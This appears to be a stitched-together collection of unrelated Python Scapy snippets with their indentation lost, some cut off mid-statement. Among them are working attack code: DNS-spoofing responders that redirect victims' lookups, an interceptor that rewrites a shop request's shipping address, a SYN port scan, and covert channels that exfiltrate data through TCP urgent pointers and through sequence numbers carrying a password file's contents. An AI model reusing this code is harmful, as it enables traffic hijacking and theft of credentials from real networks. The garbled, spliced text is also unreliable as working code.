def print_and_accept(pkt):
regex = re.compile("/ex3/shipping")
pkt.accept()
ip = IP(pkt.get_payload())
if ip["TCP"].dport == 80:
if ip.haslayer("Raw"):
http = ip["Raw"].load.decode()
if regex.search(http):
print("HTTP:")
print(http)
print("\nIP.show():")
print(ip.show())
new_msg = json.loads(http.splitlines()[-1])
new_msg["shipping_address"] = "*****@*****.**"
ip["Raw"].load = new_msg
print("\nIP.show() nr. 2:")
print(ip.show())
answer = requests.post("http://com402.epfl.ch/hw1/ex3/shipping", data=json.dumps(new_msg), headers={"Content-Type": "application/json"})
print("\nAnswer code:")
print(answer.status_code)
print("\nAnswer text:")
print(answer.text)
def send_data(self, bytestream):
if self.verbose():
print("Exfiltrating " + repr(bytestream.decode('us-ascii')))
packet = IP() / TCP()
packet.dst = self.host()
packet.dport = self.dest_port()
packet.sport = self.source_port()
packet.getlayer(TCP).flags = 0x20 | 0x02 # URG & SYN
packet.urgptr = self.int_for(bytestream)
if self.verbose():
packet.show()
send(packet, verbose=self.verbose())
def get_response(pkt: IP):
print("XD")
if (DNS in pkt and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0):
print("XD")
if page_name in str(pkt["DNS Question Record"].qname):
spf_resp = IP(dst=pkt[IP].src) / UDP(
dport=pkt[UDP].sport, sport=53) / DNS(
id=pkt[DNS].id,
ancount=1,
an=DNSRR(rrname=pkt[DNSQR].qname, rdata=FAKE_IP) /
DNSRR(rrname=page_name, rdata=FAKE_IP))
spf_resp.show()
send(spf_resp, verbose=0, iface=IFACE)
return f"Spoofed DNS Response Sent: {pkt[IP].src}"
def modify(packet):
pkt = IP(packet.get_payload())
if pkt.qd.qname == b'facebook.com.':
print(pkt.show())
p = Ether(
dst=self.MacList[0], src=self.LocalMac,
type=2048) / IP(src=pkt[IP].dst, dst=pkt[IP].src) / UDP(
sport=53, dport=pkt[UDP].sport) / DNS(
id=pkt[DNS].id,
qr=1,
qdcount=1,
ancount=1,
nscount=0,
arcount=0,
qd=DNSQR(
qname=pkt[DNS].qd.qname, qtype=1, qclass=1),
an=DNSRR(rrname=pkt[DNS].qd.qname,
type=1,
rclass=1,
rdata=ip),
ns=None,
ar=None)
sendp(p, verbose=0)
#packet.set_payload(bytes(str(pkt), 'utf-8')) #set the packet content to our modified version
packet.drop() #drop the packet
else:
packet.accept()
def get_response(pkt: IP):
# First check if it is a
# DNS request packet
if (DNS in pkt and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0):
# Init site in banned list
# to be False.
site_in_list = False
# Find out if the site is
# in the banned list.
for site in website_list:
if site in str(pkt["DNS Question Record"].qname):
site_in_list = True
# If the site is in the banned list
# spoof the packet.
if site_in_list:
# Create a spoofed packet
spf_resp = IP(
src=DNS_SERVER_IP, dst=pkt[IP].src) / UDP() / DNS(an=DNSRR(
rrname=pkt[DNSQR].qname, ttl=299, rdata='127.0.0.1'))
# Print for demo purposes
print(
"******************** SITE IN BANNED LIST *****************"
)
print(
"****************** SPOOFED PACKET BELOW ******************"
)
spf_resp.show()
# Send spoofed packet
send(spf_resp, verbose=2, iface=IFACE)
return f"Spoofed DNS Response Sent: {pkt[IP].src}"
else:
# Send the real response packet
return forward_dns(pkt)
def send(self, packet):
original_packet = IP(dst=self.target_ip,src=self.return_ip)/UDP(dport=self.target_port,sport=self.return_port)/packet
if self.verbose > 1:
print "Original packet:"
original_packet.show()
hexdump(str(original_packet))
fragments = fragment(original_packet, fragsize = self.fragment_size)
try:
i = 1
for frag in fragments:
if self.verbose > 1:
print "Fragment %d of %d:" % (i, len(fragments))
frag.show()
frag = str(frag)
length = struct.pack(">I", len(frag))
if not self.sock:
print '[+] connecting ...'
self.sock = self.create()
print '[+] sending part %d of %d now..' % (i, len(fragments))
hexdump(frag)
if self.log:
self.log.packet('sending fragment %d of %d' % (i, len(fragments)), frag)
self.sock.send(length)
self.sock.send(frag)
if self.log:
self.log('sent fragment %d of %d' % (i, len(fragments)))
i += 1
if self.raw_send:
if self.log:
self.log('forcing a new connection due to raw_send flag')
self.close()
except KeyboardInterrupt,e:
print "[-] keyboard interrupt while connecting/sending to redirector"
raise KeyboardInterrupt,e
def get_response(pkt):
if (DNS in pkt and pkt[IP].src != DNS_SERVER_IP
and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0):
if 'trailers.apple.com' in str(pkt['DNS Question Record'].qname):
spoofed = IP(dst=pkt[IP].src)\
/UDP(dport=pkt[UDP].sport, sport=53)\
/DNS(id=pkt[DNS].id, ancount=1, an=DNSRR(rrname=pkt[DNSQR].qname, rdata=DNS_SERVER_IP))
print(spoofed.show())
send(spoofed, verbose=0)
return f'Spoofed DNS Response Sent: {spoofed.summary()}'
else:
return forward_dns(pkt)
class IPLayer(object):
"""docstring for IPLayer"""
"""Argument has to a dictionay of python """
def __init__(self, arguments={}):
# super(IPLayer, self).__init__()
self.packet = None
if not isinstance(arguments, dict): return "Please provide a dictionay"
self.arguments = arguments
def make(self):
self.packet = IP()
for param in self.arguments:
if not hasattr(self.packet, param): continue
setattr(self.packet, param, self.arguments[param])
return self
def updatePacket(self, arguments={}):
if not isinstance(arguments, dict): return "Please provide a dictionay"
for param in arguments:
if not hasattr(self.packet, param): continue
setattr(self.packet, param, arguments[param])
def getPacket(self):
return self.packet
def show(self):
return self.packet.show()
def addTCP(self):
packet = TCPLayer()._getTCP()
self.packet = self.packet / packet
return self
def prependEther(self):
packet = EtherLayer()._getEther()
self.packet = packet / self.packet
return self
def _getIP():
return IP()
import os, sys, struct
from select import select
from scapy.all import IP
from fcntl import ioctl
f = os.open("/dev/tap0", os.O_RDWR)
try:
while 1:
r = select([f],[],[])[0][0]
if r == f:
packet = os.read(f, 4000)
# print len(packet), packet
ip = IP(packet)
ip.show()
except KeyboardInterrupt:
print "Stopped by user."
#!/usr/bin/python3
# Scapy is a python library that allows us to design, manipulate, intercept and process packets
# Scapy sets header fields by default.
# Have to be root to run this.
from scapy.all import IP, ICMP, sr1, ls
ip_layer = IP(src="192.168.0.1", dst="www.google.com")
#print(ip_layer.show())
icmp_req = ICMP()
# Help to list (ls) details about the layer.
print(ls(ip_layer))
print(ip_layer.show())
print(ip_layer.summary())
print(icmp_req.show())
# Add the layers together with /
packet = ip_layer / icmp_req
#print(packet.show())
received_packet = sr1(packet)
if received_packet:
print(received_packet.show())
i.src = source_input
u = UDP(dport=53)
d = DNS(rd=1,qd=DNSQR(qname=query_input))
# Print all information.
print ""
print "Information"
print "==========="
print "Source IP : %s" %source_input
print "Destination IP: %s" %destination_input
print "DNS Query : %s" %query_input
print ""
print "Package details"
print "==============="
print ""
print i.show()
print ""
print u.show()
print ""
print d.show()
print ""
# Confirmation.
is_ok = raw_input("Is it OK? (Y/n)")
# Send or exit.
if is_ok == "y" or is_ok == "Y" or is_ok == "":
p = send(i/u/d)
else:
print "Bye."
l = logging.getLogger("scapy.runtime")
l.setLevel(49)
from scapy.all import send, IP, TCP, ICMP, UDP
wb = load_workbook(filename=os.getcwd() + "/sample.xlsx")
# grab the active worksheet
# sheet = wb.active
sheet = wb['Test']
for row in sheet.rows:
protocol = row[0].value
if (protocol == 'ICMP'):
a = IP(src=row[1].value,
dst=row[2].value,
proto=protocolNumber(row[0].value)) / ICMP() / TCP(
sport=row[3].value, dport=row[4].value) / "Hello World"
a.show()
send(a)
if (protocol == 'TCP'):
a = IP(src=row[1].value,
dst=row[2].value,
proto=protocolNumber(row[0].value)) / TCP(
sport=row[3].value, dport=row[4].value, flags='S',
seq=42) / "Hello World"
a.show()
send(a)
if (protocol == 'UDP'):
a = IP(src=row[1].value,
dst=row[2].value,
proto=protocolNumber(row[0].value)) / UDP(
sport=row[3].value, dport=row[4].value) / "Hello World"
a.show()
import select
import time
from scapy.all import IP, ICMP
from pytun import TunTapDevice, IFF_TAP, IFF_TUN, IFF_NO_PI
tun = TunTapDevice(flags=IFF_TUN | IFF_NO_PI, name="FakePing")
tun.addr = "10.10.10.1"
tun.netmask = '255.255.255.0'
tun.up()
epoll = select.epoll()
epoll.register(tun.fileno(), select.EPOLLIN)
while True:
while epoll.poll(0):
data = tun.read(tun.mtu)
packet = IP(data)
icmp_part = packet.getlayer(ICMP)
if icmp_part is not None:
time.sleep(desire_time)
respacket = IP(src=packet.dst, dst=packet.src, ttl=desire_ttl)
respacket /= ICMP(type=0, seq=icmp_part.seq, id=icmp_part.id)
respacket /= icmp_part.payload
tun.write(bytes(respacket))
packet.show()
respacket.show()
time.sleep(0.01)
p=sr(IP(src="192.168.43.55", dst="www.secdev.org")/TCP(sport=RandShort(),dport=[20,21,80,443,3389], flags="S"),inter=0.5,retry=2,timeout=1)
#traceroute
traceroute(["www.google.com"], maxttl=20)
#traceroute con puerto 23
traceroute (["10.1.99.2"],dport=23,maxttl=20)
#paquete por capas
IP()
IP()/TCP()
Ether()/IP()/TCP()
IP()/TCP()/"GET / HTTP/1.1\r\n\r\n"
Ether()/IP(dst="api.tidex.com")/TCP(dport=443)/"GET /api/3/ticker/eth_btc HTTP/1.1\r\nHost: api.tidex.com\r\nConnection: close\r\n\r\n"
Ether()/IP()/IP()/UDP()
#armado de paquetes por capas
a=Ether(); a.show()
b=IP(); b.show()
c=TCP(); c.show()
d=sr(a/b/c,timeout=2)
#enviar paquete por capas
ans,unans=sr(IP(dst="api.tidex.com")/TCP(sport=RandShort(),dport=443)/"GET /api/3/ticker/eth_btc HTTP/1.1\r\nHost: api.tidex.com\r\nConnection: close\r\n\r\n")
#############HTTP
##super importante
#https://stackoverflow.com/questions/9058052/unwanted-rst-tcp-packet-with-scapy
#iptables -A OUTPUT -p tcp --tcp-flags RST RST -s 192.168.43.55 -j DROP
load_layer("http")
req = HTTP()/HTTPRequest(
Accept_Encoding=b'gzip, deflate',
Cache_Control=b'no-cache',
Connection=b'keep-alive',
#! /usr/bin/env python
from scapy.all import TCP, IP, send
import time
src_naame = '10.0.2.15' # Enter ip of listener
src_port = 666 # Enter port on which listener iss listening
i = 0
sn = 70
f = open("/home/MadMaxx/Desktop/psswd.txt", 'r')
webs = ['twitter.com', 'google.com', 'reddit.com']
for line in f.readlines():
for c in line:
serv = webs[i]
ip = IP(dst=serv, src=src_naame)
p = sn * 1000 + ord(c)
tcp = TCP(sport=src_port, dport=443, flags='S', seq=p)
send(ip / tcp)
ip.show()
tcp.show()
time.sleep(0.5)
send(ip / TCP(dport=443, flags='F'))
sn += 1
if i + 1 == len(webs):
i = 0
else:
i += 1
